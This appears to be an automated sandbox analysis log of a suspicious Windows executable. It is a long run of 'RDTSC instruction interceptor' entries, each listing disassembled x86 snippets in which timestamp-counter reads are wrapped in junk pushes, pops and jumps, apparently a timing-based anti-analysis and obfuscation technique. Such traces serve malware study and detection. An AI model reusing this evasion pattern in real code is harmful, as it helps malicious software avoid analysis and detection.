              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F7A2C5 second address: F7A2D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F7A7E0 second address: F7A81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DC6CD048h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F88DC6CD036h 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a jmp 00007F88DC6CD03Eh 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F7A81B second address: F7A83D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007F88DD0CB151h 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edx 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F824FE second address: F82506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F82506 second address: F8250C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F8250C second address: F82512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F80551 second address: F80558 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F80558 second address: F8055E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F8055E second address: F80564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F80564 second address: F8056F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F8056F second address: F80575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F806D3 second address: F806E8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F88DC6CD03Eh 0x00000008 push ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F806E8 second address: F80711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F88DD0CB160h 0x0000000f jne 00007F88DD0CB146h 0x00000015 jmp 00007F88DD0CB154h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F80A0E second address: F80A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F88DC6CD036h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F80BBA second address: F80BBF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F80BBF second address: F80BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jo 00007F88DC6CD036h 0x00000011 jnl 00007F88DC6CD036h 0x00000017 push esi 0x00000018 pop esi 0x00000019 jc 00007F88DC6CD036h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 jl 00007F88DC6CD036h 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F80BE9 second address: F80BEF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F80D6A second address: F80D7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD03Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F80D7B second address: F80D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F88DD0CB14Bh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F811AD second address: F811B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F811B3 second address: F811C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F811C4 second address: F811D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD03Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F81327 second address: F8134D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007F88DD0CB152h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F8134D second address: F81351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F81351 second address: F81377 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F88DD0CB146h 0x00000008 jmp 00007F88DD0CB150h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jns 00007F88DD0CB14Ch 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F8A734 second address: F8A73A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F8AA17 second address: F8AA1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F8AA1B second address: F8AA21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F8AA21 second address: F8AA2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F88DD0CB146h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F8C325 second address: F8C32B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F8C32B second address: F8C35E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F88DD0CB14Ch 0x0000000b popad 0x0000000c pushad 0x0000000d jg 00007F88DD0CB15Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F8C35E second address: F8C37B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F88DC6CD042h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F8C37B second address: F8C381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F97674 second address: F97678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F9EEFA second address: F9EF0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DD0CB14Ah 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: ED4071 second address: ED4077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: ED4077 second address: ED407C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FAB8FC second address: FAB902 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FAB902 second address: FAB91D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F88DD0CB152h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FAE9B5 second address: FAE9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FAE9B9 second address: FAE9BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FAE9BD second address: FAE9E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F88DC6CD036h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F88DC6CD045h 0x00000014 pop edx 0x00000015 pop ecx 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FAE9E7 second address: FAE9ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FB514E second address: FB517A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DC6CD043h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F88DC6CD040h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FB517A second address: FB517E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FB517E second address: FB518C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F88DC6CD04Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FB518C second address: FB51C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DD0CB151h 0x00000009 popad 0x0000000a push edx 0x0000000b push ecx 0x0000000c jmp 00007F88DD0CB159h 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FB3AC0 second address: FB3AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DC6CD041h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FB3AD5 second address: FB3AF3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F88DD0CB152h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FB3AF3 second address: FB3AFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FB3AFD second address: FB3B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FB3B03 second address: FB3B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FBBA9D second address: FBBAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FBBAA1 second address: FBBABF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F88DC6CD043h 0x0000000b popad 0x0000000c push edi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FBBABF second address: FBBAC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FC7FF3 second address: FC7FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FD74BE second address: FD74C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FD74C2 second address: FD74D6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F88DC6CD036h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F88DC6CD038h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED28B second address: FED28F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED28F second address: FED2AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F88DC6CD036h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f js 00007F88DC6CD036h 0x00000015 jno 00007F88DC6CD036h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED2AF second address: FED2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED41D second address: FED423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED423 second address: FED443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F88DD0CB14Eh 0x0000000b push eax 0x0000000c pop eax 0x0000000d jns 00007F88DD0CB146h 0x00000013 popad 0x00000014 pushad 0x00000015 push edx 0x00000016 jo 00007F88DD0CB146h 0x0000001c pop edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED5A3 second address: FED5A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED5A9 second address: FED5AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED5AD second address: FED5BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED5BA second address: FED5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED6EC second address: FED6FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 popad 0x00000009 je 00007F88DC6CD036h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED6FD second address: FED702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED702 second address: FED724 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD040h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F88DC6CD038h 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED854 second address: FED85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED85F second address: FED86F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DC6CD03Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FED86F second address: FED882 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEDB9D second address: FEDBB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DC6CD041h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEDBB9 second address: FEDBBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEDED1 second address: FEDEDF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F88DC6CD038h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEDEDF second address: FEDEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEDEE3 second address: FEDEE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEDEE7 second address: FEDEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEE034 second address: FEE03A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEE03A second address: FEE052 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F88DD0CB14Eh 0x00000008 jne 00007F88DD0CB146h 0x0000000e pushad 0x0000000f popad 0x00000010 js 00007F88DD0CB14Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEE178 second address: FEE17E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEE17E second address: FEE193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DD0CB151h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEE193 second address: FEE19D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FEE19D second address: FEE1A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF1188 second address: FF118E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF118E second address: FF1193 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF3D71 second address: FF3DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F88DC6CD045h 0x0000000a popad 0x0000000b push eax 0x0000000c ja 00007F88DC6CD040h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jc 00007F88DC6CD040h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF3DAB second address: FF3DBC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F88DD0CB146h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF3FEE second address: FF3FF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: FF3FF4 second address: FF4004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F88DD0CB14Ch 0x00000009 rdtsc
